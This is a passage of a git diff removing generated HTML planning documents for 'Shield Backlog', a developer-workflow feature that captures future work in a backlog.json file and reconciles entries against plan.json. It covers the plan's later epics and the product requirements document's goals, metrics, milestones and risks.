-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); <strong>LOCKED</strong> match key = exact normalized (<code>casefold()</code> + collapsed whitespace); <strong>UPDATED (P0-2): both existing and proposed-new epics match by exact normalized NAME</strong> (epic id <code>EPIC-N</code> is a positional within-plan slot, not a cross-plan key), no fuzzy ranking (TRD §5 F7/F8); suggestion typed against the real shapes (P0-1): <code>suggest_feature</code> reads <code>manifest.features[].name</code>, <code>suggest_epic</code> reads <code>plans[feature].epics[]</code> (plans = <code>dict[slug→plan]</code>, path derived); never block capture; a tie (≥2 matches) surfaces all and auto-picks none.</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; <code>auth</code> fixture surfaces <code>auth</code> top candidate + 2-way tie auto-picks neither; <strong>a suggested feature value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path</strong>; capture succeeds with proposed-new when none.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-epic-suggester.md#api-contracts"><code>epic-suggester</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step (<code>/research</code>/<code>/prd</code>/<code>/plan</code>/<code>/implement</code>) and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>promote &lt;id&gt;</code> affordance; forward id as transient reference; document non-persistence; shippable work routes through <code>/plan</code>, direct <code>/implement</code> for rare planless one-offs.</li>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories (F6); tool never auto-routes.</li>
-<li><strong>Design:</strong> <a href="../trd.md#product-journey">§4 Product Journey</a></li>
-</ul>
-<blockquote>
-<p><strong>Intra-epic dependency:</strong> EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them.</p>
-</blockquote>
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, apply the single <strong>&quot;epic landed&quot; predicate</strong> (TRD §5 F8): remove iff an epic with the matching <strong>normalized-exact name</strong> is <strong>present in <code>plan.json.epics[]</code></strong> — story <code>status</code> is never consulted. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code> with <code>reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -&gt; RemovalDecision</code> (pure fn; manifest = list-keyed <code>features[]</code>, <code>plans</code> = <code>{slug→plan}</code> with path <strong>derived</strong> — P0-1); <strong>UPDATED (P0-2)</strong> match key = epic by casefold+collapsed-ws exact <strong>name</strong> for both existing and proposed-new (never by positional <code>EPIC-N</code> id; a re-planned reorder must still resolve); tie/no-match → stays; story status never consulted; never-remove-on-doubt; drift tolerance with logged warning; define <code>RemovalDecision</code> + <strong>log every removal</strong> <code>{entry id, feature, epic, match-kind (name), triggering run, gating plan.json path}</code>.</li>
-<li><strong>AC:</strong> removed only when an epic with normalized-exact <strong>name</strong> is present in <code>plan.json.epics[]</code> (story status not consulted), prd-only not; <strong>a re-planned epic reorder (same name, new <code>EPIC-N</code>) still resolves</strong>; epic-name collision across two features → ambiguous → entry stays; malformed/old shapes → entry stays (logged), no exception; every removal emits the structured log line.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a> · LLD <a href="../lld-reconciler.md#sequence-flows"><code>reconciler</code> §6 Sequence flows</a></li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code> (via the transient reference); lazy sweep on <code>/backlog</code> view. Both idempotent; both call the one reconciliation engine. Ships the kill switch and closes the uncommitted-state recovery gap. <em>Lands after EPIC-3-S1 + EPIC-3-S2.</em></p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook at end of <code>/plan</code> + <code>/implement</code>; lazy sweep on view; idempotent remove-if-present + shared engine; <strong>kill switch</strong> <code>.shield.json</code> <code>backlog.auto_reconcile</code> (default true) disabling eager + lazy (§14 rollback fallback) — <strong>requires an additive <code>backlog</code> object in <code>shield/schemas/shield.schema.json</code></strong> (P0-3; current schema is <code>additionalProperties:false</code>); <strong>RESOLVED (P1-1)</strong> the single recovery mechanism is append-to-<code>.shield/backlog-removed.log</code> <strong>before</strong> the destructive prune (commit-before-prune is a non-goal); no-op prune writes no log/recovery record; <strong>instrument the N2 ~1s budget</strong> with a debug-gated latency line (WARN &gt; 1s).</li>
-<li><strong>AC:</strong> promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine; <code>backlog.auto_reconcile=false</code> (now schema-valid) disables both, leaving manual-remove; <strong>end-of-run prune appends to <code>.shield/backlog-removed.log</code> before remove; replay restores the entry</strong>; debug latency line reports view+sweep wall time + WARN above 1s.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a> · LLD <a href="../lld-reconciler.md#concurrency-and-state"><code>reconciler</code> §8 Concurrency &amp; state</a></li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<p>Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), recovery-rehearsal.</p>
-<ul>
-<li><strong>Tasks:</strong> fixtures <strong>from the real artifact schemas</strong> (P0-1: list-keyed <code>manifest.features[]</code>, boolean <code>plan_json</code> flag) covering prd-only-stays, plan-committed-removed, ambiguous-stays (epic-name collision across features), malformed-stays, <strong>re-planned-epic-reorder-still-resolves</strong> (same name, new <code>EPIC-N</code> — P0-2); evals incl. duplicate-id rejection; <strong>concurrency/lost-update eval</strong> (P1-1: a concurrent on-disk change between read and <code>os.replace()</code> is refused with <code>BacklogInvalid</code> — no corruption, no lost entry); <strong>write-side eval</strong> (P1-b: <code>capture()</code> producing a schema-invalid doc refuses, byte-unchanged); <strong>no-stamping eval (F6)</strong>; <strong>recovery-rehearsal eval</strong> (P1-c: crash at the ordering seam — after log-append, before remove — still recoverable via replay); name a <strong>concrete CI entrypoint</strong> (the actual workflow file + runner) + path-filter glob (<code>shield/{schema,scripts,skills/general/backlog}/**</code>, <code>shield/commands/backlog.md</code>).</li>
-<li><strong>AC:</strong> suite under <code>shield/evals/</code> covers all listed behaviors (incl. re-plan reorder, lost-update detection, write-side refusal, ordering-seam recovery); fixtures use real manifest/plan shapes; self-contained (no API/LLM); PR body has RED + GREEN; the named CI workflow runs on the backlog-asset glob.</li>
-<li><strong>Design:</strong> <a href="../trd.md#milestones">§10 Milestones</a></li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<p>Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize <code>/backlog</code> + backlog SKILL.md docs.</p>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code>; bump <code>backlog_store</code> <code>pyproject.toml</code> (<strong>unconditional</strong> — P1-4, it's a packaged module); commit the <code>shield/schemas/shield.schema.json</code> <code>backlog</code> change (P0-3) in the same commit; finalize command/skill docs (capture, three triggers, kill switch, <strong>name</strong> match key, manual remove, badges, <strong>wrong-removal recovery procedure</strong>); document a <strong>fixed monthly</strong> <code>/backlog</code> audit with the concrete PRD §7 revisit triggers (&lt;70% terminal in 30d, or &gt;20% untouched &gt;60d); add explicit DoD lines (&quot;PR reviewed and merged&quot;, &quot;marketplace version published&quot;); CHANGELOG.</li>
-<li><strong>AC:</strong> version bumped in <code>marketplace.json</code> + <code>backlog_store</code> <code>pyproject.toml</code> and the <code>shield.schema.json</code> change committed, all in one commit; command + SKILL document capture/view/promote/remove + 3 triggers + kill switch + recovery procedure + fixed monthly audit with numeric triggers; explicit DoD lines present; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> <a href="../trd.md#references">§13 References</a></li>
-</ul>
-<hr />
-<h2 id="validate-the-bet-from-v1-data--p1--pm10-decided-2026-05-27">Validate the bet from v1 data  <em>(P1 — PM10, decided 2026-05-27)</em></h2>
-<p>No pre-build baseline gate. The load-bearing assumption (PRD §10: lost future-work volume is high enough to justify the tool) is <strong>accepted for v1</strong> and validated <em>after</em> M1 ships, from <code>backlog.json</code>'s own add/remove git history over the first 30 days (the §7 success metric). If that data shows the backlog isn't earning its keep, revisit scope before investing further in M2/M3.</p>
-<h2 id="carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</h2>
-<ul>
-<li>Capture-from-skill interface defined → <strong>EPIC-1-S2</strong> / TRD §11 (closed — F3 signature locked).</li>
-<li><code>backlog.json</code> <code>schema_version</code> + migration → <strong>EPIC-1-S1</strong> / TRD §9.</li>
-<li>Reconciliation read-contract drift tolerance → <strong>EPIC-3-S2</strong> / TRD §6 N3.</li>
-<li>Eager-prune + lazy-sweep idempotency → <strong>EPIC-3-S3</strong> / TRD §5 F9.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/plan-review</code> — re-run multi-agent review on the refreshed plan + new TRD.</li>
-<li><code>/pm-sync</code> — sync epics + stories to ClickUp.</li>
-<li><code>/implement</code> — begin TDD implementation at M1 / EPIC-1-S1.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/prd.html b/docs/shield/backlog-20260527/outputs/prd.html
deleted file mode 100644
index 928f91ec..00000000
--- a/docs/shield/backlog-20260527/outputs/prd.html
+++ /dev/null
@@ -1,392 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>PRD — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#1-header">1. Header</a>
-</li>
-<li><a href="#2-terminologies">2. Terminologies</a>
-</li>
-<li><a href="#3-problem--context">3. Problem &amp; context</a>
-</li>
-<li><a href="#4-target-users--personas">4. Target users / personas</a>
-</li>
-<li><a href="#5-architecture--flows">5. Architecture &amp; flows</a>
-</li>
-<li><a href="#6-goals--non-goals">6. Goals &amp; non-goals</a>
-<ul>
-<li><a href="#goals">Goals</a></li>
-<li><a href="#non-goals">Non-goals</a></li>
-</ul>
-</li>
-<li><a href="#7-success-metrics">7. Success metrics</a>
-</li>
-<li><a href="#8-milestones">8. Milestones</a>
-</li>
-<li><a href="#9-open-questions">9. Open questions</a>
-<ul>
-<li><a href="#decided-locked-for-v1">Decided (locked for v1)</a></li>
-<li><a href="#still-open">Still open</a></li>
-</ul>
-</li>
-<li><a href="#10-risks--assumptions">10. Risks &amp; assumptions</a>
-<ul>
-<li><a href="#risks">Risks</a></li>
-<li><a href="#assumptions">Assumptions</a></li>
-</ul>
-</li>
-<li><a href="#11-out-of-scope--non-goals">11. Out of scope / Non-goals</a>
-</li>
-</ul>
-</nav>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>), a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed when this epic's work appears in the feature's <code>plan.json</code> (or removed manually — see §9).</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by <strong>epic id</strong>, a proposed-new-epic entry matches by <strong>epic name</strong> (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A <code>prd</code>-only feature does <strong>not</strong> trigger removal. Removal fires at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry, or on the <code>/backlog</code> view sweep.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Ashwini — Shield maintainer running <code>/research</code>/<code>/plan</code>/<code>/implement</code> daily</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via <code>/plan</code> or <code>/implement</code> is pruned at the <strong>end of that run</strong> (the command carries the entry as a transient promotion reference); the <code>/backlog</code> view sweep is the lazy safety net for work that landed without an explicit reference; and a <strong>manual remove</strong> clears ideas decided against or anything not tied to a promotion run.</p>
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile → remove from backlog:&lt;br/&gt;end of promoted /plan or /implement,&lt;br/&gt;or /backlog sweep (work now in plan.json)&quot;]
-  plan --&gt; rec
-  impl --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: an entry promoted via <code>/plan</code> or <code>/implement</code> is removed at the end of that run; the <code>/backlog</code> view also sweeps out any entry whose work has since landed in a <code>plan.json</code>. The backlog reflects only not-yet-committed work.</li>
-<li><strong>Manual remove</strong>: any entry can be explicitly removed from <code>/backlog</code> — covers ideas decided against and entries not cleared by a promotion run.</li>
-</ul>
-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists until it is removed — at the end of the <code>/plan</code> or <code>/implement</code> it was promoted from, by the <code>/backlog</code> sweep once its work is in a <code>plan.json</code>, or manually. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>≥60% of agent feature/epic suggestions accepted without override</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capture is a single <code>/backlog add</code> (or one agent action) and never blocks the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Measurement (v1):</strong> no telemetry — metrics are tracked manually via a periodic <code>/backlog</code> audit and the git history of <code>backlog.json</code> (entry add/remove commits). Owner: @ashwinimanoj.</p>
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code>; an entry can be manually removed from <code>/backlog</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; removal fires eagerly at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry and lazily on the <code>/backlog</code> sweep; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="9-open-questions">9. Open questions</h2>
-<h3 id="decided-locked-for-v1">Decided (locked for v1)</h3>
-<ul>
-<li><strong>Reconciliation triggers:</strong> an entry is removed (a) <strong>eagerly</strong> at the end of the <code>/plan</code> or <code>/implement</code> run it was promoted <em>from</em> — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) <strong>lazily</strong> by the <code>/backlog</code> view sweep, which prunes any entry whose epic's work is now in a <code>plan.json</code> (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into <code>plan.json</code>.</li>
-<li><strong>Reconciliation match key:</strong> feature (via <code>manifest.json</code>) + epic. Existing-epic entries match by <strong>epic id</strong>; proposed-new-epic entries match by <strong>epic name</strong> (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.</li>
-<li><strong>Ordering scheme:</strong> a single explicit integer <code>order</code> field per entry (like <code>orderindex</code>); no priority buckets in v1.</li>
-<li><strong>Entry granularity:</strong> entries carry a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>); promotion always yields ≥1 story regardless of <code>kind</code>.</li>
-<li><strong>Shippable work routes through <code>/plan</code>:</strong> anything that produces stories is promoted via <code>/plan</code> so it lands in <code>plan.json</code> (the lazy-sweep signal) and is pruned at the end of that <code>/plan</code> run. Direct <code>/implement</code> stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the <code>/implement</code> run too.</li>
-<li><strong>Manual remove:</strong> <code>/backlog</code> supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.</li>
-</ul>
-<h3 id="still-open">Still open</h3>
-<ul>
-<li><strong>Feature/epic discovery cost.</strong> Epics live inside per-feature <code>plan.json</code>, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; add a project-level epic index only if this gets slow.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see §11 Out of scope.)</li>
-</ul>
-<h2 id="10-risks--assumptions">10. Risks &amp; assumptions</h2>
-<h3 id="risks">Risks</h3>
-<table>
-<thead>
-<tr>
-<th>Risk</th>
-<th>Mitigation</th>
-<th>Owner</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog becomes a graveyard (captured, never acted on)</td>
-<td>Reconciliation prunes plan-committed work on <code>/backlog</code> view; periodic audit surfaces stale entries; §7 counter-metric tracks it</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Concurrent writes corrupt <code>backlog.json</code> (capture racing reconciliation)</td>
-<td>Atomic write (temp-then-rename); validate-or-refuse on read; <code>backlog.json</code> is git-tracked so corruption is revertable</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)</td>
-<td>Match on feature + epic only; never remove on ambiguity (entry stays); <code>git revert</code> recovers any bad removal</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Capture friction too high → nobody captures</td>
-<td>Single-step capture; agent can capture without prompting</td>
-<td>@ashwinimanoj</td>
-</tr>
-</tbody>
-</table>
-<h3 id="assumptions">Assumptions</h3>
-<ul>
-<li><strong>(unvalidated)</strong> Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.</li>
-<li><strong>(unvalidated)</strong> The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own <code>backlog.json</code> history will validate it.</li>
-<li><strong>(assumed stable)</strong> Epic names in <code>plan.json</code> are stable enough to serve as the proposed-new-epic match key (see §9).</li>
-<li><strong>(validated)</strong> <code>manifest.json</code> is feature-keyed and <code>plan.json</code> carries <code>epics[].stories[]</code> — confirmed against the current schema.</li>
-</ul>
-<h2 id="11-out-of-scope--non-goals">11. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<hr />
-<blockquote>
